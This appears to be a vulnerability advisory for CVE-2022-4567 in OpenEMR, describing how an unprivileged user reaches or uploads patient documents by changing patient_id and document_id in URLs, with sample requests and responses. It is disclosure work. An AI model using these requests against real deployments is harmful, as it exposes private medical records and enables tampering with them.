OpenEMR – Broken Access Controls in Patient’s Document Section (CVE-2022-4567)
Summary
An authenticated user with no permissions to access “document” section has the ability to direct access any document in the system by manipulating the patient_id and document_id parameters in the url. The autoincrement identifier was also susceptible of being bruteforced for both parameters, lowering the difficulty of finding valid documents. The second instance allowed unprivileged users to upload files to any user repository.
Impact
Description
The first instance allows any user to access a document by referencing the patient_id and document_id parameters:
http://domain/openemr/controller.php?document&retrieve&patient_id=2&document_id=19
The second instance affected the upload functionality. The following example illustrates the situation:
Host: REDACTED
(…snip…)
Upgrade-Insecure-Requests: 1
—————————–247482557730593022112237721191
Content-Disposition: form-data; name=”MAX_FILE_SIZE”
64000000
—————————–247482557730593022112237721191
Content-Disposition: form-data; name=”file[]”; filename=”testBAC.txt”
Content-Type: text/plain
TESTFILE
—————————–247482557730593022112237721191
Content-Disposition: form-data; name=”dicom_folder[]”; filename=””
Content-Type: application/octet-stream
(…snip…)
—————————–247482557730593022112237721191–
The response displayed a “Documents Not Authorized” message, but the file was successfully uploaded:
GET /openemr/controller.php?document&retrieve&patient_id=2&document_id=23&as_file=false HTTP/1.1
(…snip…)
RESPONSE:
HTTP/1.1 200 OK
Date: Fri, 07 Oct 2022 16:07:36 GMT
Server: Apache/2.4.54 (Debian)
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Description: File Transfer
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=”testBAC.txt”
Content-Length: 8
Connection: close
Content-Type: text/plain;charset=utf-8
TESTFILE